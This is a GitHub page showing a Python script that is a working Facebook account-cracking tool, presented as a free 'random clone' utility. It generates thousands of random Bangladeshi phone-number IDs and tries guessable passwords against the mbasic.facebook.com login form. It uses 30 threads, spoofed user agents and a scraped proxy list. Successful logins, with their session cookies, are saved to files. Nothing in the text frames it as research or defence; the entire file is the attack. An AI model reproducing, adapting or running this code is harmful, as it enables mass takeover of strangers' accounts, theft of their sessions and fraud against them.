-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathMumit.py
218 lines (209 loc) · 7.78 KB
/
Mumit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
#Script
# Respotary Star
#----------------------------------------------------------------------------------------------------------
#CREATE BY : MUMIT ISLAM HIMU
#WHATSAPP : +8801644777805
#GITHUB : https://github.com/MUMIT-404-CYBER
#----------------------------------------------------------------------------------------------------------
import os,sys,time,json,random,re,string,platform,base64,uuid
from bs4 import BeautifulSoup as sop
from bs4 import BeautifulSoup
import requests as ress
from datetime import date
from datetime import datetime
from time import sleep
from os import system as s
from time import sleep as waktu
try:
import requests
from concurrent.futures import ThreadPoolExecutor as ThreadPool
import mechanize
from requests.exceptions import ConnectionError
except ModuleNotFoundError:
os.system('pip install mechanize requests futures bs4==2 > /dev/null')
os.system('pip install bs4')
RED = '\033[1;91m'
WHITE = '\033[1;97m'
GREEN = '\033[1;32m'
YELLOW = '\033[1;33m'
BLUE = '\033[1;34m'
ORANGE = '\033[1;35m'
P = '\x1b[1;97m'
M = '\x1b[1;91m'
H = '\x1b[1;92m'
K = '\x1b[1;93m'
B = '\x1b[1;94m'
U = '\x1b[1;95m'
O = '\x1b[1;96m'
N = '\x1b[0m'
A = '\x1b[1;90m'
BN = '\x1b[1;107m'
BBL = '\x1b[1;106m'
BP = '\x1b[1;105m'
BB = '\x1b[1;104m'
BK = '\x1b[1;103m'
BH = '\x1b[1;102m'
BM = '\x1b[1;101m'
BA = '\x1b[1;100m'
now = datetime.now()
dt_string = now.strftime("%H:%M")
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
today = date.today()
loop = 0
oks = []
cps = []
ugen2=[]
ugen=[]
cokbrut=[]
ses=requests.Session()
princp=[]
try:
prox= requests.get('https://api.proxyscrape.com/v2/?request=displayproxies&protocol=socks4&timeout=100000&country=all&ssl=all&anonymity=all').text
open('.prox.txt','w').write(prox)
except Exception as e:
print('')
prox=open('.prox.txt','r').read().splitlines()
for xd in range(10000):
a='Nokia'
b=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
c=random.randrange(1, 99)
d='/GoBrowser/'
e='1.6.0.'
f=random.randrange(1, 99)
uaku2=(f'{a}{b}{c}{d}{e}{f}')
ugen.append(uaku2)
def __init__(self):
self.id = []
self.ok = []
self.cp = []
self.loop = 0
logo = ("""\033[1;37m
_____ ___ ______ _____________ ________
/ _/ | / / | / / __ \/ ____/ ____/ | / /_ __/
/ // |/ / |/ / / / / / / __/ / |/ / / /
_/ // /| / /| / /_/ / /___/ /___/ /| / / /
/___/_/ |_/_/ |_/\____/\____/_____/_/ |_/ /_/
==================================================
[] AUTHOR : MUMIT ISLAM HIMU
[] TOOLS : RANDOM CLONE
[] TYPE : FREE
[] FACEBOOK : Mumit Islam
[] WHATSAPP : +8801644777805
==================================================""")
logo1 = ("""\033[1;37m
_____ ___ ______ _____________ ________
/ _/ | / / | / / __ \/ ____/ ____/ | / /_ __/
/ // |/ / |/ / / / / / / __/ / |/ / / /
_/ // /| / /| / /_/ / /___/ /___/ /| / / /
/___/_/ |_/_/ |_/\____/\____/_____/_/ |_/ /_/
==================================================""")
def mumitx():
print('==================================================')
def Main():
os.system("clear")
print(logo)
print(" [1] RANDOM CRACK")
print(" [0] Exit")
Mumit =input("\n [?] Choose : ")
if Mumit in ["1","01"]:
fuck()
if Mumit in [" 0", "00"]:
exit()
else:
exit()
def fuck():
user=[]
os.system('clear')
print(logo)
print('[+] EXAMPLE CODE: 017, 018, 019, 016')
code = input('[?] CHOOSE CODE : ')
name = ''.join(random.choice(string.digits) for _ in range(2))
cod = ''.join(random.choice(string.digits) for _ in range(2))
os.system('clear')
print(logo)
print('[+] EXAMPLE: 2000 3000 5000 10000 ')
limit = int(input('[?] CHOOSE : '))
for nmbr in range(limit):
nmp = ''.join(random.choice(string.digits) for _ in range(4))
user.append(nmp)
with ThreadPool(max_workers=30) as yaari:
os.system('clear')
print(logo1)
tl = str(len(user))
print('[+] Total ids: '+tl)
print("[+] Your Code: "+code)
print('[+] Process has been started')
print('[+] Use flight mode for speed up')
print('==================================================')
for love in user:
uid = code+name+cod+love
pwx = [code+name+cod+love,cod+love,name+love,code+name+cod,'bangladesh','Bangladesh']
yaari.submit(mumit2,uid,pwx,tl)
print('==================================================')
print(' [+] Crack process has been completed')
print(' [+] OK Ids saved in INNOCENT/OK.txt')
print(' [+] CP Ids saved in INNOCENT/CP.txt')
print('==================================================')
def mumit2(uid,pwx,tl):
global loop
global cps
global oks
global proxy
try:
for ps in pwx:
pro = random.choice(ugen)
session = requests.Session()
sys.stdout.write('\r\033[1;92m[INNOCENT]--[%s/%s]--[OK-%s]~[CP-%s] \r'%(loop,tl,len(oks),len(cps))),
sys.stdout.flush()
free_fb = session.get('https://free.facebook.com').text
log_data = {
"lsd":re.search('name="lsd" value="(.*?)"', str(free_fb)).group(1),
"jazoest":re.search('name="jazoest" value="(.*?)"', str(free_fb)).group(1),
"m_ts":re.search('name="m_ts" value="(.*?)"', str(free_fb)).group(1),
"li":re.search('name="li" value="(.*?)"', str(free_fb)).group(1),
"try_number":"0",
"unrecognized_tries":"0",
"email":uid,
"pass":ps,
"login":"Log In"}
header_freefb = {'authority': 'mbasic.facebook.com',
"method": 'GET',
"scheme": 'https',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'accept-language': 'en-US,en;q=0.9',
'cache-control': 'max-age=0',
'referer': 'https://mbasic.facebook.com/',
'sec-ch-ua': '"Chromium";v="107", "Not=A?Brand";v="24"',
'sec-ch-ua-mobile': '?1',
'sec-ch-ua-platform': '"Android"',
'sec-fetch-dest': 'document',
'sec-fetch-mode': 'navigate',
'sec-fetch-site': 'same-origin',
'sec-fetch-user': '?1',
'upgrade-insecure-requests': '1',
'user-agent': pro}
lo = session.post('https://mbasic.facebook.com/login/?next&ref=dbl&fl&login_from_aymh=1&refid=8',data=log_data,headers=header_freefb).text
log_cookies=session.cookies.get_dict().keys()
if 'c_user' in log_cookies:
coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
cid = coki[7:22]
print(f"\033[1;92m[INNOCENT-OK] {uid}|{ps} \nCookie : {coki}")
open('/sdcard/INNOCENT/OK.txt', 'a').write( uid+' | '+ps+'\n')
oks.append(uid)
break
elif 'checkpoint' in log_cookies:
coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
cid = coki[82:97]
print(f"\033[1;94m[INNOCENT-CP] {cid}|{ps}")
open('/sdcard/INNOCENT-CP.txt', 'a').write( uid+' | '+ps+' \n')
cps.append(uid)
break
else:
continue
loop+=1
except:
pass
Main()